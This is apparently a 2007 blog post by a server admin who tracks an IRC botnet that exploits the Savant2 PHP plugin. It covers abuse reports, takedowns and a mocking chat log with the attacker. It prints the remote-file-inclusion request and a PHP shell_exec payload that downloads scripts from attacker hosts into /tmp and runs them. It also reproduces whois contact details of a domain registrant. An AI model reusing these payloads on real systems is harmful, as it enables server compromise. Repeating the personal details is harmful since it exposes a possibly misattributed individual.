B10[mg]

As mentioned before I've been obsessed with stopping botnets. Well, this one, operated by a script kiddie named "fazanul".

Today I've seen his attack on my machine again. And, after sending the usual abuse emails, I've decided to have a little chat with him. As I feared, this is the ultimate script kiddie. But first, a little about his latest "attack".

The attack this time was launched using a new host:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1

Fazanul.com? Interesting! This kiddie was stupid enough to register a domain. He's, however, still abusing the Savant2 hole. So who's behind fazanul.com?

$ gwhois fazanul.com
[...]
Domain Name.......... fazanul.com
  Creation Date........ 2007-01-23
  Registration Date.... 2007-01-23
  Expiry Date.......... 2008-01-23
  Organisation Name.... Stanley Livingston
  Organisation Address. 455 Rose Quartz Place
  Organisation Address. 
  Organisation Address. Castle Rock
  Organisation Address. 80108
  Organisation Address. CO
  Organisation Address. UNITED STATES

Admin Name........... Stanley Livingston
  Admin Address........ 455 Rose Quartz Place
  Admin Address........ 
  Admin Address........ Castle Rock
  Admin Address........ 80108
  Admin Address........ CO
  Admin Address........ UNITED STATES
  Admin Email.......... fazanul5004@yahoo.com
  Admin Phone.......... +1.9094813680
  Admin Fax............ 

Tech Name............ YahooDomains TechContact
  Tech Address......... 701 First Ave.
  Tech Address......... 
  Tech Address......... Sunnyvale
  Tech Address......... 94089
  Tech Address......... CA
  Tech Address......... UNITED STATES
  Tech Email........... domain.tech@YAHOO-INC.COM
  Tech Phone........... +1.6198813096
  Tech Fax............. 
  Name Server.......... yns1.yahoo.com
  Name Server.......... yns2.yahoo.com

You've got to be kidding me! He registered it today! And look at that, we have fazanul5004@yahoo.com, and it looks like Yahoo is hosting this domain.

$ host fazanul.com
fazanul.com has address 68.142.212.125
fazanul.com has address 68.142.212.126
fazanul.com has address 68.142.212.127
fazanul.com has address 68.142.212.128
fazanul.com has address 68.142.212.129
fazanul.com has address 68.142.212.130
fazanul.com mail is handled by 20 mx1.biz.mail.yahoo.com.
fazanul.com mail is handled by 30 mx5.biz.mail.yahoo.com.

Ugh, yeah, the files are even hosted by Yahoo (the IPs belong to Yahoo). So those should be gone within 48 hours ;-)

So, now that we've found his domain, let's have a little chat with him. He chose Bucharest.RO.EU.Ultra-Chat.Org again as command center, yet this time the channel #out. Let's login, and why not use the nickname Sorin (remember? ;-)

Here's what happened... enjoy (the red comments are added by me later)

<Sorin> Fazanul!
<Sorin> You're back :-)
<Sorin> Let's see how long fazanul.com will last
<fazanul> ??
<fazanul> what?
<Sorin> I've killed your MUIE botnet before ... and another one after that I
          believe ...
<Sorin> let's see how long it'll take to kill this botnet
<Sorin> But ermm, registering your domain @ yahoo?!? Are you crazy man?
<fazanul> nop
<fazanul> haking host
<Sorin> Ok ... well, let's see how long these drones here will last
<Sorin> Oh you now hack domain registry servers?
<fazanul> yeah
<Sorin> Ah ok ... somehow I have a hard time believing you. Your botnet Perl
          scripts look like crappy cut'n'paste jobs, not showing too much
          knowledge and full of script kiddie fingerprints ...
<fazanul> i have haking host and redirect and domains
<Sorin> fazanul.com has address 68.142.212.128
<fazanul> domains by yahooo
<Sorin> The whois points to yahoo, the IP points to yahoo ... so you hack
          Yahoo's Domain Registry service. Sweet
<fazanul> lollll

Yeah right ... he's registering domains through Yahoo himself now?

<Sorin> anyways, let's see how long it'll be up.
<fazanul> ok man 
<fazanul> part
<fazanul> by channels
<fazanul> i have work
<Sorin> Can't you ban me? Like usually? ;-)
<fazanul> nop
<fazanul> part you
<Sorin> Oh well, will see your next "attack" ... and remember I'll stop those
          too ;-P
<Sorin> #muie is awfully empty ...
<fazanul> yeah
<fazanul> stop

Did he just ask me to *stop* attacking his botnets?!?

<Sorin> Why? You attack my machine, I attack you. Too bad I'm a little more
          successful
<fazanul> what machine you?
<Sorin> Oh come on ... I won't tell you. That's spoiling the fun. I don't
          know your next move, you don't know my host
<fazanul> ntroduction
<fazanul> E-mail for several domains are handled by mail.b10m.net
          <212.238.141.98>, most likely the domain you've tried to reach
          too.
[snipped more info from mail.b10m.net here]

I logged in the IRC channel, from this machine (mail.b10m.net). 
He was clever enough to look that up. Unfortunately for him, 
the attacks are *not* launched on this vhost ;-)

Anyways, now we know *his* IP address: 

212.138.64.171 - - [22/Jan/2007:23:36:54 +0100] "GET / HTTP/1.0" 200 3240 
"-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) 
Gecko/20061206 Firefox/1.5.0.9"


<fazanul> ....
<fazanul> understand
<Sorin> Oh, you got me there.
<Sorin> Darn it
<fazanul> -mail for several domains are handled by mail.b10m.net
          <212.238.141.98>
<fazanul> :))))
<fazanul> hashahahahaha

Funny, he actually pointed me out to a typo. That IP address *used* to be my 
IP address. Nowadays I have 217.19.21.103...

<Sorin> Ah yes ... oh well, I talk to you later then
<fazanul> to believe
<Sorin> You're too smart for me
<fazanul> :))))))))

SignOff: Sorin (fazanul ... the ultimate script kiddie)

Let's see how long this new botnet will last ... and let's see when I will meet my buddy fazaNULL again :-)

Update (2007/01/24): poor, poor fazanul. After receiving a canned reply from Yahoo abuse, in which they really shared my pain of receiving spam, but the message really didn't originate at a Yahoo mail server (what message again?), they did act on this domain:

$ HEAD http://fazanul.com/c.txt
503 Service Temporarily Unavailable
[...]
X-Host: p10w8.geo.mud.yahoo.com
X-INKT-SITE: http://us.geocities.com/server-errors
X-INKT-URI: http://us.geocities.com/server-errors/pd_disabled.html

And sure enough, http://fazanul.com/ is pretty obvious:

Site Temporarily Disabled

This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

Mission accomplished ... again ;-)

fazanul, botnet, script kiddie

Looking at your Apache logfiles can be fun. A lot of annoying people try to do all kinds of crazy stuff. Today I noticed this GET request:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://electrafusion.com/c.txt?? 
  + HTTP/1.1

Since I'm not a fan of PHP, chances are I don't have this file. And yup, I was correct. I didn't have that file. But the URI in there made me curious. What is that c.txt doing exactly?

<?
shell_exec('cd /tmp;wget http://electrafusion.com/botek.txt;
   + mv botek.txt .sessx;perl .sessx;rm botek.txt.*;
   + wget http://saids.com/a;chmod +x a;
   + mv a sess_vttn737j6k0mci66akhs5u1261;
   + ./sess_vttn737j6k0mci66akhs5u1261;
   + rm a*');
...
?>

Ah! Nice. Go to /tmp, download botek.txt from the same server (see below), move that file to .sessx and execute it. Then delete the botek.txt file, get yet another file (now from saids.com, but a non-existing file...) execute that too and delete everything.

The script is a little longer, but basically it's trying various ways to get and launch these additional files.

So what does botek.txt exactly do? It opens an IRC connection a Bucharest.RO.EU.Ultra-Chat.Org. On that server (83.170.75.108), it joins the channel #muie and starts listening for commands from two nicknames (fazanul and Sorin ... our 1337 script kiddie). This in fact is rather dangerous. I doubt this botnet will be tremendously big, yet of course this "über hacker" will keep a list of vulnerable hosts. (To you system admins: check if your Savant2_Plugin_textarea.php is vulnerable!).

I found a real easy way to get protected agains these a**h*les though. Just login to the IRC server, join #muie with a nickname like MUIE|X|\d+ (where \d+ is a random number ;-) and mock this script kiddie' Perl knowledge. Call him script kiddie and they'll ban your IP within a minute. Woohoo! Now my server is safe from them, for my server can't login to the channel ;)

Anyways, after spending some time in the channel, I noticed quite a few of vulnerable hosts already as this picture shows:

Sad but true ...

So who's hosting these files?

$ host electrafusion.com
electrafusion.com has address 208.179.58.67
electrafusion.com mail is handled by 10 electrafusion.com.

$ gwhois 208.179.58.67
Process query: '208.179.58.67'
[...]
OrgName:    Tierzero 
OrgID:      TIERZ
Address:    700 Wilshire Blvd.
Address:    Suite 600
City:       Los Angeles
StateProv:  CA
PostalCode: 90017
Country:    US
[...]
OrgTechHandle: TECHT-ARIN
OrgTechName:   TECH-TIERZERO 
OrgTechPhone:  +1-213-284-0555
OrgTechEmail:  ipnetworkops@tierzero.net
[...]

Start complaining! ;-) I already contacted TierZero, yet I haven't received any replies, and the files are still online :-(

The most ironic thing about this script kiddie is actually the last line of the botek.txt:

# NOTE: DONT REMOVE COPYRIGHTS

Update: TierZero did act on this botnet now:

PING electrafusion.com (208.179.58.67): 56 data bytes
36 bytes from hoanet-gw.dcap1.lax.us.tierzero.net (208.179.32.130): 
Communication prohibited by filter
Vr HL TOS  Len   ID Flg  off TTL Pro  cks      Src      Dst
 4  5  00 5400 a156   0 0000  38  01 b149 xxx.xxx.xxx.xxx  208.179.58.67 

--- electrafusion.com ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

Of course I had to tell this Sorin about this news and this is what our conversation was like:

Sorin: w
... thinking I was a zombie, he wanted to see who was online

Me: hahaha where did electrafusion.com go? ;-P
Sorin: bitch

Update: As expected, the script kiddie found a new webserver to download the bot scripts from: http://www.depdiknas.go.id/c.txt

The domain resolves to 222.124.249.2, which belongs to TELKOMNET. abuse@telkom.net.id has been informed and hopefully will respond fast.

I figured I'd also might be able to get the IRC server gone:

$ host Bucharest.RO.EU.Ultra-Chat.Org
Bucharest.RO.EU.Ultra-Chat.Org has address 83.170.75.108

$ gwhois 83.170.75.108
Process query: '83.170.75.108'
[...]
% Information related to '83.170.64.0 - 83.170.79.255'

inetnum:        83.170.64.0 - 83.170.79.255
netname:        UK2-NET
descr:          UK2.NET - UK's biggest host
country:        GB
admin-c:        BB963-RIPE
tech-c:         BB963-RIPE
rev-srv:        ns1.uk2.net
rev-srv:        ns2.uk2.net
status:         ASSIGNED PA
mnt-by:         AS13213-MNT
source:         RIPE # Filtered
[...]

This ISP has also been informed.

Update (2007/01/12): The botnet seems to have crumbled! Woohoo!

$ lwp-request -m HEAD http://www.depdiknas.go.id/c.txt
403 Forbidden
[...]

Now that the initial script cannot be called anymore, let's see what we have in our beloved #muie channel:



There's but 2 "users" in there (yes, antimuie is me ;-). Even the fanazul and Sorin nicks are no longer logged in.

Victory!

botnet, savant2, exploit, sorin, fazanul, botek.txt, muie, tierzero, uk2.net telkomnet